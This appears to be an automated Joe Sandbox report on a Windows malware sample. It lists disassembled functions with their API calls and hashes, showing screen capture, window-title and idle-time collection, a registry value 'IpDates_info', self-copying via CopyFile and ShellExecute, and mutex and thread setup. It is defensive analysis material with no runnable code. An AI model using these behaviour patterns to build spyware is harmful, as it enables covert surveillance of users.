                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                      • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                    • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                    • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                    • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                    • CopyFileA.KERNEL32 ref: 10015D73
                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                    • String ID: %s\%s$open
                                                                                    • API String ID: 1843445691-538903891
                                                                                    • Opcode ID: e7f28f5a4b885a6ba46114f6e73ff4f4218401e27e461504ff04f219dfe5ff0b
                                                                                    • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                    • Opcode Fuzzy Hash: e7f28f5a4b885a6ba46114f6e73ff4f4218401e27e461504ff04f219dfe5ff0b
                                                                                    • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62
                                                                                    Function 0307A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0307A48D
                                                                                    • _malloc.LIBCMT ref: 0307A4D1
                                                                                    • _free.LIBCMT ref: 0307A503
                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0307A522
                                                                                    • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0307A594
                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 0307A59F
                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0307A5C5
                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 0307A5DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                    • String ID: &
                                                                                    • API String ID: 2794124522-3042966939
                                                                                    • Opcode ID: d86e30e8550c75f270cc5b08d63a66c8a6710e18ac02afafc1505abbc614e577
                                                                                    • Instruction ID: b13781807b4edab11a837ade3ab12dbeb2c90708049f0d9569016150e8519545
                                                                                    • Opcode Fuzzy Hash: d86e30e8550c75f270cc5b08d63a66c8a6710e18ac02afafc1505abbc614e577
                                                                                    • Instruction Fuzzy Hash: AE5163B5E02219AFDB14DFA4C844EEEB7F8BF88740F048519E905AB350D734A905CBE8
                                                                                    Function 027152B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02715382
                                                                                    • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02715392
                                                                                    • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0272C6E0,000012A0), ref: 027153B0
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027153BB
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0271540F
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0271541B
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 02715434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                    • String ID: IpDates_info$SOFTWARE
                                                                                    • API String ID: 864241144-2243437601
                                                                                    • Opcode ID: 9d627ac1ebeab97241fc44f1b4b41c6f1e5c2f66dfd322972cb14ca2a6dddb97
                                                                                    • Instruction ID: 45188d72c9ea0cc4d9852fb65dd45705bdea2c736164308565eeeb0cb7b84339
                                                                                    • Opcode Fuzzy Hash: 9d627ac1ebeab97241fc44f1b4b41c6f1e5c2f66dfd322972cb14ca2a6dddb97
                                                                                    • Instruction Fuzzy Hash: FF41D872A842419FD32D8F3C8C4AF7BBBA5EF95308FD94549E58197142D3B0D50AC792
                                                                                    Function 027152D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02715382
                                                                                    • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02715392
                                                                                    • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0272C6E0,000012A0), ref: 027153B0
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027153BB
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0271540F
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0271541B
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 02715434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                    • String ID: IpDates_info$SOFTWARE
                                                                                    • API String ID: 864241144-2243437601
                                                                                    • Opcode ID: f2b2a572b9429f76a029f12935df9aacf6e0c38a31740ab46e06dc34425f06f0
                                                                                    • Instruction ID: d4ba3a8f71d592fee618f2bd0ddc94754b63e520507313bdfc4f9b8e142fb5a3
                                                                                    • Opcode Fuzzy Hash: f2b2a572b9429f76a029f12935df9aacf6e0c38a31740ab46e06dc34425f06f0
                                                                                    • Instruction Fuzzy Hash: BB31C4306843819FE73DCF38881AF7ABBA5AF85308FDD8848E5859B142C3B0D50AC752
                                                                                    Function 0040C15C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000,00000000), ref: 0040C17A
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C19E
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C1AD
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C1BF
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C21C
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C245
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-GB,en,en-US,
                                                                                    • API String ID: 975949045-3021119265
                                                                                    • Opcode ID: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction ID: 62fecbf31074def960baab5c845f0e3528801b11b7ae68e71bde5ae064a172bd
                                                                                    • Opcode Fuzzy Hash: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction Fuzzy Hash: EC2196A0750701BADB207BBA8C8365925999B85B09F50457FF041BB7C2DE7C9D4182AF
                                                                                    Function 0307CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,030912F8,2DB1A981,00000001,00000000,00000000), ref: 0307CAB1
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 0307CAE0
                                                                                    • _memset.LIBCMT ref: 0307CB44
                                                                                    • _memset.LIBCMT ref: 0307CB53
                                                                                    • RegEnumValueW.KERNEL32 ref: 0307CB72
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                      • Part of subcall function 0307F707: std::exception::exception.LIBCMT ref: 0307F756
                                                                                      • Part of subcall function 0307F707: std::exception::exception.LIBCMT ref: 0307F770
                                                                                      • Part of subcall function 0307F707: __CxxThrowException@8.LIBCMT ref: 0307F781
                                                                                    • RegCloseKey.KERNEL32(030912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,030912F8,000000FF), ref: 0307CC83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                    • String ID: Console\0
                                                                                    • API String ID: 1348767993-1253790388
                                                                                    • Opcode ID: 44bf4ded7bd3f1967069259dfb1c8b63e64528d3b45ffa31c636a2a2534d16ac
                                                                                    • Instruction ID: 1bb89b27930279cc5efc7218f9451f6f0166f63f87efab9d79a31ea1b9c21214
                                                                                    • Opcode Fuzzy Hash: 44bf4ded7bd3f1967069259dfb1c8b63e64528d3b45ffa31c636a2a2534d16ac
                                                                                    • Instruction Fuzzy Hash: 23611FB5D01219AFDB04DFA8D880EEEB7B8FF88310F14456AE915EB245D7349901CBA4
                                                                                    Function 0307BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • _memset.LIBCMT ref: 0307BB21
                                                                                    • GetLastInputInfo.USER32(?), ref: 0307BB37
                                                                                    • GetTickCount.KERNEL32 ref: 0307BB3D
                                                                                    • wsprintfW.USER32 ref: 0307BB66
                                                                                    • GetForegroundWindow.USER32 ref: 0307BB6F
                                                                                    • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0307BB83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                    • String ID: %d min
                                                                                    • API String ID: 3754759880-1947832151
                                                                                    • Opcode ID: 9d7cf5e9a0b16ddf0548154d69a761d92152b79c169bf576e43186787132de4c
                                                                                    • Instruction ID: c5064d333844729e1d26562f48079e835e888292f7ee429a441f3ff38ca5593c
                                                                                    • Opcode Fuzzy Hash: 9d7cf5e9a0b16ddf0548154d69a761d92152b79c169bf576e43186787132de4c
                                                                                    • Instruction Fuzzy Hash: 6441A4B5D01218AFCB10EFA4D884EDFBBB8EF88700F188555E9099B345D6749A04CBE5
                                                                                    Function 03076910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(2DB1A981,00000000,00000000,75BF73E0,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076938
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076947
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076960
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 0307696B
                                                                                    • SysStringLen.OLEAUT32(00000000), ref: 030769BE
                                                                                    • SysStringLen.OLEAUT32(00000000), ref: 030769CC
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,030910DB,000000FF), ref: 03076A2E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,030910DB,000000FF), ref: 03076A34
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                    • String ID:
                                                                                    • API String ID: 429299433-0
                                                                                    • Opcode ID: 109509788f21255b895eaa3f1f68fc4d233fa5924139c2817147c0eda63f17fc
                                                                                    • Instruction ID: 63da5c9e6a4ab377852ffdafbf2c03853d3561431edc05d761dd9781e66d2cb5
                                                                                    • Opcode Fuzzy Hash: 109509788f21255b895eaa3f1f68fc4d233fa5924139c2817147c0eda63f17fc
                                                                                    • Instruction Fuzzy Hash: 4A4184B2E0561DABDB10DFA8CC40AEEF7F8FB84710F144666D955E7240D77659008BA4
                                                                                    Function 10015DF0 Relevance: 12.0, APIs: 8, Instructions: 41synchronizationthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                    • GetLastError.KERNEL32 ref: 10015E13
                                                                                    • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                    • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                    • CreateThread.KERNEL32 ref: 10015E58
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 355449500-0
                                                                                    • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                    • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25
                                                                                    Function 03076D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 03076DD9
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,03095164,00000000,00020019,75BF73E0), ref: 03076DFC
                                                                                    • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03076E4A
                                                                                    • lstrcmpW.KERNEL32(?,03095148), ref: 03076E60
                                                                                    • lstrcpyW.KERNEL32(030756EA,?), ref: 03076E72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                    • String ID: GROUP
                                                                                    • API String ID: 2102619503-2593425013
                                                                                    • Opcode ID: 1d6d92bb800cb6f925dd643d9b71dafcd321a08c6623d83f21392b51e7d1996d
                                                                                    • Instruction ID: cce26deaa97c2d529c230690acef6fb05c9192c0916f843a197be3b90b206a03
                                                                                    • Opcode Fuzzy Hash: 1d6d92bb800cb6f925dd643d9b71dafcd321a08c6623d83f21392b51e7d1996d
                                                                                    • Instruction Fuzzy Hash: BA31857190231DBBDB20DF90DC89BDEB7B8FB48710F100699E519A7180DB79AA84CF64
                                                                                    Function 0271721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 02717240
                                                                                    • __calloc_crt.LIBCMT ref: 0271724C
                                                                                    • __getptd.LIBCMT ref: 02717259
                                                                                    • CreateThread.KERNEL32 ref: 02717290
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0271729A
                                                                                    • _free.LIBCMT ref: 027172A3
                                                                                    • __dosmaperr.LIBCMT ref: 027172AE
                                                                                      • Part of subcall function 0271710D: __getptd_noexit.LIBCMT ref: 0271710D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 155776804-0
                                                                                    • Opcode ID: d993ed99873ab9e31c8e43eada4ed98a1b73905c705f513c612ccff121726920
                                                                                    • Instruction ID: 202107dd127ed9b702fe2bc5bc3e77cb5f2e75ae144d5d07c78d4129b040c1be
                                                                                    • Opcode Fuzzy Hash: d993ed99873ab9e31c8e43eada4ed98a1b73905c705f513c612ccff121726920
                                                                                    • Instruction Fuzzy Hash: AE11E532200306AFE72AAFAC9C48E9BB7E9EF45774B100419FA1496140DB31C5128AA0
                                                                                    Function 0307FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0307FA4E
                                                                                    • __calloc_crt.LIBCMT ref: 0307FA5A
                                                                                    • __getptd.LIBCMT ref: 0307FA67
                                                                                    • CreateThread.KERNEL32 ref: 0307FA9E
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,0307E003,00000000,00000000,03075F40,00000000,00000000,00000000), ref: 0307FAA8
                                                                                    • _free.LIBCMT ref: 0307FAB1
                                                                                    • __dosmaperr.LIBCMT ref: 0307FABC
                                                                                      • Part of subcall function 0307F91B: __getptd_noexit.LIBCMT ref: 0307F91B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 155776804-0
                                                                                    • Opcode ID: 17db6ad38d07714fa3b131fe870307e0d1c6559e97e9d92ea3b9962dad8ee1c0
                                                                                    • Instruction ID: 00c09cf191429b072a365e4f92501543b7fc49d8295b8ebc3f2616a6da96f3ac
                                                                                    • Opcode Fuzzy Hash: 17db6ad38d07714fa3b131fe870307e0d1c6559e97e9d92ea3b9962dad8ee1c0
                                                                                    • Instruction Fuzzy Hash: C111C27A60770BBFDB11FFA5EC4099B37D9EF85A647140426F9448A180DB70D4018A68
                                                                                    Function 03077410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03077523), ref: 0307743D
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 03077444
                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 03077452
                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 0307745A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 3433367815-192647395
                                                                                    • Opcode ID: 541ddd0232c3bba90f859af4b9871e6917a384791fba0e60afbfd2ccb6471e11
                                                                                    • Instruction ID: 0e3a638a837931eae169ee4bd30006f7eac9d764cf11bd614500b2e37cba94eb
                                                                                    • Opcode Fuzzy Hash: 541ddd0232c3bba90f859af4b9871e6917a384791fba0e60afbfd2ccb6471e11
                                                                                    • Instruction Fuzzy Hash: D401A270D0220CAFCF90DFB898046FEBBF4EB08600F0005AAD559E3200E7398A10CFA4
                                                                                    Function 027171B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 027171BC
                                                                                      • Part of subcall function 02719754: TlsGetValue.KERNEL32(00000000,027198AD,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000), ref: 0271975D
                                                                                      • Part of subcall function 02719754: DecodePointer.KERNEL32(?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA,0000000D), ref: 0271976F
                                                                                      • Part of subcall function 02719754: TlsSetValue.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 0271977E
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 027171C7
                                                                                      • Part of subcall function 02719734: TlsGetValue.KERNEL32(?,?,027171CC,00000000), ref: 02719742
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 027171DA
